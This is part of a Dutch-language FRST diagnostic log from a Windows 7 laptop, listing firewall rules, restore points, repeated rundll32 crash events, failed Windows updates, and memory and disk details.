FirewallRules: [{C93C922C-C4DF-46EA-A95B-3710BC64F9E5}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{F5CCA2EC-DB53-429E-ACA7-8620B22D8C06}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{C622DDCC-B796-4660-8F52-53C9A2C081E0}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqpse.exe
FirewallRules: [{270589BD-F9AA-4035-A745-F982617B91FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{ADDCE7C9-36FB-4741-AE96-35352CE57051}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{16C169EF-ACEF-47DA-88B0-C07FFBA4B9EE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{887A2414-8A95-4587-8CD5-DCAB8779AAF2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{CA9FB48B-F86F-42D8-A364-4B7A9647B47F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1D093FF0-ED1D-40CE-A445-74B508A31071}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{E397277E-CEB3-4722-A2BD-D2BA8EAEE42F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AEEBA16F-D724-4AA8-985B-A0D9DAF19900}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{DAF940F8-2786-459B-8C4B-740B434F432C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BB5DBCFA-FA85-4258-8D6A-B324D9623C20}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{000A4630-953B-47F8-97E3-AFD4EFE0BC09}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{040020C5-2325-44AB-AF09-2B73E2909429}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{4E56A2AE-C5C8-4CDD-95EF-C9C408EC6E69}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0100E9B8-2D9A-4683-855F-31DFCF9D5253}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F1AADA27-9397-4006-A25E-1760D66CB5E4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{20B9D1CE-883E-4E9A-91AD-D34435015D4D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{59126DC5-8E2D-43CC-A7AA-229F31BE45AD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF6CDA1C-3A61-4871-A7C9-6D1AE439B2E1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C019BD90-EE72-45C9-B6A5-6DC752B753E2}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{935DD831-26ED-45F3-A755-A551EC7C2596}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C53AFE3C-F133-4A3D-93B7-CA3B976CC966}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{561BCC31-E54C-44EA-8ED2-29318B583380}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1FDD92CD-254B-45DB-8CDE-FE90704C9828}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{692FB8FC-27F2-407E-94FB-0F79430BDC43}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{6CCEF5B7-72D4-4993-97F1-BF09664D856A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{75B3CFF3-0EF5-46C1-8FFD-27C842E9C100}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C824CB98-998B-4CF0-8956-768C5D9B1649}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A33DABA3-E973-4003-A762-D5CCA651E70F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FAC66634-2441-45E4-9EEC-E9122195ED92}G:\cnc first decade\command & conquer™ generals zero hour\generals.exe] => (Allow) G:\cnc first decade\command & conquer™ generals zero hour\generals.exe
FirewallRules: [UDP Query User{EA91CD60-8EB6-4DAA-806C-32094270339D}G:\cnc first decade\command & conquer™ generals zero hour\generals.exe] => (Allow) G:\cnc first decade\command & conquer™ generals zero hour\generals.exe
FirewallRules: [{07326169-FACF-4E36-BB91-029EA797DC97}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0BB33894-020E-44DB-9721-56332B5DC296}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{3E28E94A-E8F6-4032-B917-EBF4D5041EB8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AD670F30-EA27-40FC-B129-AFE6C3B76271}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{75224D51-B351-4FEC-8042-F69368110517}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BE667AE7-6B49-4CC6-AC67-BADE7B5A1F1C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C415F02A-015F-4912-9C6A-D3EDDA0C531D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2B3BD622-92A2-4639-A168-D19FB919114C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{7E7526B5-CB06-43CF-AB9C-A34B65DBE09E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C63882FC-0E2F-4075-92AF-C5AEE083A58C}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{6C28B272-7BB0-4CB2-8CFE-AF98347B2CB7}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{92B5BD85-7136-486D-8AAC-75C56732A456}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{FBB9663E-9EBA-429F-AB73-7E5154C50E8B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{FFFC8FB7-874E-4438-8AC6-044783317071}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{B9AEB669-16AF-4319-A493-42BA169B03B9}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{805AFF7A-4905-450A-B6FB-9CF2491500A1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{7CEE2169-B9E3-4857-A453-A9A228ADD433}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{1087B0E5-1156-4FE2-88B9-C65ADA6DB9CC}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{BA644C1D-4D80-47AA-BAEE-8DE7800D5825}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{3028CFBA-CACD-4E33-A1DD-F89E5E1D51CD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{762EEFAB-1EC5-4401-8F16-BB6BCC25DA96}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{50C7A7E5-1333-455C-A320-A76A2ED6A0FE}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{B5F44752-040B-482F-AF40-4C380A6A71DD}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Block) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{CA5DE524-0016-468C-B814-FECF9FE2C52C}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Block) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [TCP Query User{998602DD-4781-49F9-AAE7-2DB5E087FD5D}C:\program files (x86)\borland\interbase\bin\ibserver.exe] => (Allow) C:\program files (x86)\borland\interbase\bin\ibserver.exe
FirewallRules: [UDP Query User{551CD93D-0A10-4080-A309-97AB02521FEA}C:\program files (x86)\borland\interbase\bin\ibserver.exe] => (Allow) C:\program files (x86)\borland\interbase\bin\ibserver.exe
FirewallRules: [{F8BE4C48-8B14-4CC2-BA4E-29FC0F7CEE7E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{DB30D244-F120-4B29-AEB2-94F16C7013EE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0CB00C40-DB61-4351-BCC5-28E8EA284D30}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0EB6CBE5-C1F5-4F16-985A-7126258F8D20}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{42419570-0934-4A50-B924-015D92592CBC}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{46F7EF7B-A20D-4FCA-B9C9-84785D2789BF}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{7047842C-DE29-4CC8-8528-DC7D00A1040A}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{E0919201-4AFD-42BF-904B-CC613F3392BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{E62E86BA-79E4-4EE9-97D1-4B743F4AE3EF}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{A0B71AC1-351D-4F49-8282-C6D7F1A70023}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{336BD99A-3F51-49D1-A4A3-6AA9C89E37A9}C:\users\thomas\appdata\roaming\wuala\wuala.exe] => (Allow) C:\users\thomas\appdata\roaming\wuala\wuala.exe
FirewallRules: [UDP Query User{B5F6953E-90F5-438B-B15F-DE7D1D288592}C:\users\thomas\appdata\roaming\wuala\wuala.exe] => (Allow) C:\users\thomas\appdata\roaming\wuala\wuala.exe
FirewallRules: [{ED82A1B2-45A3-4C50-B7FC-ABFE158FD41A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{97E1A6F9-2F8C-4732-9A51-157DA391E0E5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{A05A2A6B-F8FC-4079-8F5E-A5BE9D8D7E48}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{0DD20D9E-B5FB-4D86-A7B4-79FF18693201}] => (Allow) LPort=2869
FirewallRules: [{6A5B76B6-FE2F-492D-9B9E-7ED6E4F76392}] => (Allow) LPort=1900
FirewallRules: [{D6EAE1FE-FE05-4CDE-A935-C5C2BEB57E6B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [{300F1A3C-C002-4D5D-B3F1-091EB3EB2B71}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1544\Agent.exe
FirewallRules: [TCP Query User{E4ADC380-E1FE-463C-B447-972A4899FE72}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [UDP Query User{B53A339E-99B7-4F27-BB95-DFBB3E79E854}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [TCP Query User{D2736581-04CE-46CF-BBF8-57B4B1E2217C}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [UDP Query User{D6A6B567-2CEF-41E4-9402-949DD3F7A262}G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\game.exe
FirewallRules: [TCP Query User{82CE8EB5-9754-410D-8C28-AF5A7F79619E}G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe
FirewallRules: [UDP Query User{2AD9E574-76B9-40BF-9621-937B93DAA321}G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe] => (Allow) G:\cnc first decade\command & conquer red alert™ ii\ra2\gamemd.exe
FirewallRules: [TCP Query User{9FBF99EE-1038-4829-ACAC-C362B3626BE5}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [UDP Query User{207BEEC6-767A-40A4-A707-11D18CB4429C}C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe] => (Allow) C:\program files (x86)\tibco\studio-community-3.5\studio\3.5\studio-rcp\eclipse\studioforanalyst.exe
FirewallRules: [TCP Query User{1443DDD5-57DA-4113-8F11-F9ADAC3DD107}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{0BCD0401-4E57-4E60-9D47-759667E2C86C}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{0E83E870-4D96-49D8-9875-FF7362062F99}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1737\Agent.exe
FirewallRules: [{BC920603-7977-462F-B66E-0AF50D88F259}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1737\Agent.exe
FirewallRules: [{A039887E-CA7A-45A6-A6A7-0C16AC7B0A6E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0863B0CA-C98B-4FB1-9E80-9A808FE5745C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{4F340B66-B970-43E3-8641-E8B09553FB9A}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{45E435A9-8C71-4A85-91FC-1853475CA36D}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{30FD1B40-5D4F-435D-A6FC-6A8149E8C8FC}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F6A70613-1F5A-4541-AF7B-41BB92B1D197}] => (Allow) C:\Users\Thomas\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1C36AC92-F717-477B-9BD9-C43FD7333B82}] => (Allow) C:\Users\Thomas\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe
FirewallRules: [TCP Query User{40893ED4-C2C6-4982-B7CA-1CCC31059F42}C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe] => (Allow) C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe
FirewallRules: [UDP Query User{073C8EF8-2E92-4A06-AE2F-9545601C96B2}C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe] => (Allow) C:\users\thomas\appdata\local\microsoft\lwaplugin\x86\15.8\lwaplugin.exe
FirewallRules: [{9C88D47B-E5D4-4BDC-8B04-94808CDD4D9B}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{6955431D-B046-46F5-993D-483AC65F285B}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{16819C35-8A07-4104-B88D-4CA297F60F5F}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
FirewallRules: [{BB3F1D47-5944-4F5A-9D2B-20A67475B929}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [{5627B82E-FAF6-45FF-BF06-7356FCD7EE6B}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
FirewallRules: [TCP Query User{F186956B-55CC-4D10-AC76-68CBCC33C885}C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Block) C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [UDP Query User{F998AA64-CEB1-40F6-847F-2B14C22092BB}C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Block) C:\users\thomas\appdata\local\popcorn time\node-webkit\popcorn time.exe
FirewallRules: [{02CEA483-93FB-4E9B-B340-79C50885C2EF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{3A73E59A-1B62-484B-9B6E-275CAB8927E1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FE6D7952-BB1C-4995-B192-9EDBBB807FE9}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes Relaunch\RelicCOH.exe
FirewallRules: [{86069B56-A219-40D2-85F5-AE986AD145FD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes Relaunch\RelicCOH.exe
FirewallRules: [{02ABC2CF-6D44-4121-853C-FDA99389FB8B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes\RelicCOH.exe
FirewallRules: [{0263D880-A510-4C64-84A2-6A4D91E7BD73}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Company of Heroes\RelicCOH.exe
FirewallRules: [TCP Query User{CB4C4FC7-829D-413C-A718-C7F1C5FC3C0C}C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe
FirewallRules: [UDP Query User{DC7A120D-3A3A-471A-8A0A-90971076DA56}C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\company of heroes\relicdownloader\relicdownloader.exe
FirewallRules: [TCP Query User{EFCA8B3C-F90A-4FD0-917A-A2C9FC13417D}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{6FAD40A9-D27A-42EC-8932-DE2F2337F432}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{0052D522-1264-4D92-85CB-4B18EB040C2D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C17D4266-FC70-4F67-8A9A-A287D03642D3}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Herstelpunten =========================

30-12-2015 18:04:38 Windows Update
30-01-2016 16:51:22 Windows Update
30-01-2016 17:33:53 Windows Update
30-01-2016 20:44:37 Windows Update

==================== Defecte Apparaatbeheer Apparaten =============

Name: HP Integrated Module with Bluetooth 2.1 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.1 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Eventlog fouten: =========================

Applicatiefouten:
==================
Error: (01/31/2016 03:37:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0xd3c
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 03:18:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x12d4
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 02:17:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x1100
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:57:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x970
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:38:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x750
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 01:18:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x17ec
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:57:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x17d8
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:37:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x16e4
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/31/2016 12:17:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x1478
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3

Error: (01/30/2016 08:51:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Naam van toepassing met fout: rundll32.exe, versie: 6.1.7600.16385, tijdstempel: 0x4a5bc637
Naam van module met fout: KERNELBASE.dll, versie: 6.1.7601.19110, tijdstempel: 0x56842600
Uitzonderingscode: 0xe06d7363
Foutoffset: 0x0000c42d
Id van proces met fout: 0x15b8
Starttijd van toepassing met fout: 0xrundll32.exe0
Pad naar toepassing met fout: rundll32.exe1
Pad naar module met fout: rundll32.exe2
Rapport-id: rundll32.exe3


Systeemfouten:
=============
Error: (01/31/2016 12:00:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De Easybits Shared Services for Windows-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/31/2016 12:00:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De HP CUE DeviceDiscovery-service-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/31/2016 12:00:55 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: De hpqcxs08-service is onverwacht beëindigd. Dit is nu 1 keer gebeurd.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Update voor Microsoft Office 2010 (KB3085512) 32-bits versie.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3108664: Beveiligingsupdate voor Windows 7 voor x64-systemen.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Security Update for SQL Server 2008 Service Pack 3 (KB3045305).

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3067903: Beveiligingsupdate voor Windows 7 voor x64-systemen.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Update voor Microsoft Office 2010 (KB3055047) 32-bits versie.

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: Beveiligingsupdate voor Microsoft .NET Framework 4.5, 4.5.1 en 4.5.2 op Windows 7, Vista, Server 2008, Server 2008 R2 x64 (KB3074550).

Error: (01/30/2016 09:07:16 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installatiefout: de volgende update kan niet worden geïnstalleerd, foutcode 0x800706ba: KB3086255: Beveiligingsupdate voor Windows 7 voor x64-systemen.


==================== Geheugen info ===========================

Processor: Intel® Core™ i5 CPU M 430 @ 2.27GHz
Percentage geheugen in gebruik: 62%
Totaal fysiek RAM-geheugen: 4022.87 MB
Beschikbaar fysiek RAM-geheugen: 1492.25 MB
Totaal Virtueel geheugen: 8043.94 MB
Beschikbaar Virtual geheugen: 5124.3 MB

==================== Schijven ================================

Drive c: () (Fixed) (Total:233.48 GB) (Free:54.59 GB) NTFS ==>[systeem met boot componenten (verkregen van schijf)]
Drive d: (RECOVERY) (Fixed) (Total:17.05 GB) (Free:2.77 GB) NTFS ==>[systeem met boot componenten (verkregen van schijf)]
Drive e: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32
Drive g: (Games) (Fixed) (Total:214.94 GB) (Free:100.97 GB) NTFS

==================== MBR & Partitietabel ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: D1034207)
Partition 1: (Not Active) - (Size=993 KB) - (Type=42)
Partition 2: (Active) - (Size=199 MB) - (Type=42)
Partition 3: (Not Active) - (Size=233.5 GB) - (Type=42)
Partition 4: (Not Active) - (Size=232.1 GB) - (Type=42)

==================== Eind van Addition.txt ============================


#2
